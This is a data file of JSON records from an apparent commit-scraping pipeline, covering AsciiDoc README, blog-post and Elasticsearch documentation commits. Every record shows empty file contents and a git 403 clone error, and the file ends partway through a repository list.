{"commit":"4e9883a0d48c0465ff98325603dabb2d93a065e5","subject":"picture","message":"picture\n","repos":"xbib\/catalog-entities","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xbib\/catalog-entities.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e96212548bdb5fc354008aa117ea19571d8900c","subject":"add diagram overview","message":"add diagram overview\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d058c309b265b351be7eb2888d422a6ba35451d0","subject":"Added Still Maintained status","message":"Added Still Maintained status\n","repos":"willis7\/Heimdall,willis7\/Heimdall","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willis7\/Heimdall.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d4da27af8bd75dd95ddcaad4b52ff161baddb68","subject":"Add README\/documentation.","message":"Add README\/documentation.\n","repos":"funcool\/bide,funcool\/bide","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/bide.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a843597856ad459995a4fab2fc766f09a4ba5389","subject":"Starting work on a script for JetBrains webinar","message":"Starting work on a script for JetBrains webinar\n","repos":"donglo38\/wildfly-samples,sensaid\/wildfly-samples,LC1207\/wildfly-samples,LC1207\/wildfly-samples,LC1207\/wildfly-samples,arun-gupta\/wildfly-samples,LC1207\/wildfly-samples,arun-gupta\/wildfly-samples,sensaid\/wildfly-samples,sensaid\/wildfly-samples,arun-gupta\/wildfly-samples,LC1207\/wildfly-samples,sensaid\/wildfly-samples,sensaid\/wildfly-samples,donglo38\/wildfly-samples,donglo38\/wildfly-samples,arun-gupta\/wildfly-samples,donglo38\/wildfly-samples,arun-gupta\/wildfly-samples,donglo38\/wildfly-samples","old_file":"webinar\/script.asciidoc","new_file":"webinar\/script.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LC1207\/wildfly-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"689312235df010747b75e3e0889d666deeb9f390","subject":"Update 2014-09-27-define-universe-part-1.adoc","message":"Update 2014-09-27-define-universe-part-1.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-27-define-universe-part-1.adoc","new_file":"_posts\/2014-09-27-define-universe-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1aaa8bddc01e07cb52c8bc4408b5dad89123355","subject":"Create test-file-layout.adoc","message":"Create 
test-file-layout.adoc","repos":"iresty\/programming-openresty-zh","old_file":"testing\/test-file-layout.adoc","new_file":"testing\/test-file-layout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iresty\/programming-openresty-zh.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"184db7d4b5f81ea5a205583f7608a3ca3946c286","subject":"Create 2015-07-15-forge-2.17.0.final.asciidoc","message":"Create 2015-07-15-forge-2.17.0.final.asciidoc","repos":"luiz158\/docs,forge\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2015-07-15-forge-2.17.0.final.asciidoc","new_file":"news\/2015-07-15-forge-2.17.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"42bc9cac3086a2f4ad9ac67ebde87622ba4236ad","subject":"Fixing broken","message":"Fixing broken\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/doc_e\/common_components.adoc","new_file":"doc\/MML4\/doc_e\/common_components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"848ee61f0be2363d8278ba52df25ab7106b9de6f","subject":"Issue #4 Communication section and some terms in the glossary.","message":"Issue #4 Communication section and some terms in the glossary.\n","repos":"uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"99e216844693412efb966059ccf2852512b8da78","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6de9f73996b2731c62dc6c1ca5d85856ceba42b","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7ba716de1f1c4cce174f1c66a0e9a880e77da12f","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e00a0fdcf2f9980270b17d7b4cfa51f43ab092b","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"667ad9f2e879e8805837db005919f0f7e9beee47","subject":"Update 2011-08-24-PHP-system-locale-and-i18n.adoc","message":"Update 2011-08-24-PHP-system-locale-and-i18n.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-08-24-PHP-system-locale-and-i18n.adoc","new_file":"_posts\/2011-08-24-PHP-system-locale-and-i18n.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"742813389966f7604869dbf482393cf64dea86d5","subject":"y2b create post WTF is a Scuf Controller?","message":"y2b create post WTF is a Scuf Controller?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-01-WTF-is-a-Scuf-Controller.adoc","new_file":"_posts\/2014-08-01-WTF-is-a-Scuf-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25be2d082e4b5f074de3007ec56f4b0ea9958e0e","subject":"Update 2016-04-13-Performance-is-a-feature.adoc","message":"Update 2016-04-13-Performance-is-a-feature.adoc","repos":"melix\/hubpress,melix\/hubpress,melix\/hubpress,melix\/hubpress","old_file":"_posts\/2016-04-13-Performance-is-a-feature.adoc","new_file":"_posts\/2016-04-13-Performance-is-a-feature.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/melix\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7776b2f12249798c52db71a0e661bad0ff1055f8","subject":"COMPILING: Clean up language related to DeuTex 5 requirement.","message":"COMPILING: Clean up language related to DeuTex 5 requirement.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ba12b80c06bad25fb012e79bc6a6e05bf8ca68a7","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37618c06418a1392c6fc35674b6ed71853a35444","subject":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","message":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc6b0b4f7a3cc436465fe9016b9a6f08a903da14","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cffc917f1945cc019618c2fddb923fad5280349","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2589bc23c12755676a333e0fce7f382f6521bfcc","subject":"Update 2016-03-18-Test-abc.adoc","message":"Update 2016-03-18-Test-abc.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Test-abc.adoc","new_file":"_posts\/2016-03-18-Test-abc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5371a89e52b9c5aa674f417a0c3f8b9d3534221d","subject":"Update 2016-08-09-VC-C4819.adoc","message":"Update 
2016-08-09-VC-C4819.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-09-VC-C4819.adoc","new_file":"_posts\/2016-08-09-VC-C4819.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a62483449c294380c214d8825cbc1837c54924","subject":"Update script query doc for 5.1","message":"Update script query doc for 5.1\n\nFrom 5.1, we changed the order of Script class ctor.\n\nRelated to https:\/\/github.com\/elastic\/elasticsearch\/pull\/21321#issuecomment-266432519\n","repos":"LewayneNaidoo\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,HonzaKral\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,henakamaMSFT\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,Helen-Zhao\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,pozhidaevak\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,LeoYao\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,vroyer\/elassandra,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,MaineC\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,robin13\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasti
csearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,glefloch\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elasticassandra,mohit\/elasticsearch,geidies\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,henakamaMSFT\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,s1monw\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,bawse\/elasticsearch,i-am-Nathan\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,IanvsPoplicola\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,StefanGor\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elassandra,C-Bish\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,JackyMai\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,brandonkearby\/elasticsearch,JackyMai\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,obourgain\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,LeoYao\/elasticsearch,ZTE-PaaS\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,nilabhsagar\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasti
csearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,elasticdog\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,bawse\/elasticsearch,jimczi\/elasticsearch,HonzaKral\/elasticsearch,obourgain\/elasticsearch,scorpionvicky\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,fernandozhu\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,StefanGor\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,ZTE-PaaS\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,jprante\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,nazarewk\/elasticsearch","old_file":"docs\/java-api\/query-dsl\/script-query.asciidoc","new_file":"docs\/java-api\/query-dsl\/script-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85402d5220d86ecebf6f2332a9743e717016ce24","subject":"[DOCS] Remove non-valid link to mapping migration document","message":"[DOCS] Remove non-valid link to mapping migration 
document\n","repos":"LeoYao\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,rlugojr\/elasticsearch,liweinan0423\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,henakamaMSFT\/elasticsearch,mikemccand\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,a2lin\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,liweinan0423\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,Shepard1212\/elasticsearch,yanjunh\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,artnowo\/elasticsearch,spiegela\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,ricardocerq\/elasticsearch,dongjoon-hyun\/elasticsearch,rajanm\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,gmarz\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,dongjoon-hyun\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,vroyer\/elassandra,jimczi\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,nezirus\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,maddin2016\/elasticsearch,glefloch\/elasticsearch,JervyShi\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,spiegela\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,ricardocerq\/elasticsearch,fernandozhu\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,nilabhsagar\/elasticsearch,mohit\/elasticsearch,dongjoon-hyun\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,nazarewk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,liweinan0423\/elasticsearch,a2lin\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,i-am-
Nathan\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,MaineC\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,MaineC\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,wangtuo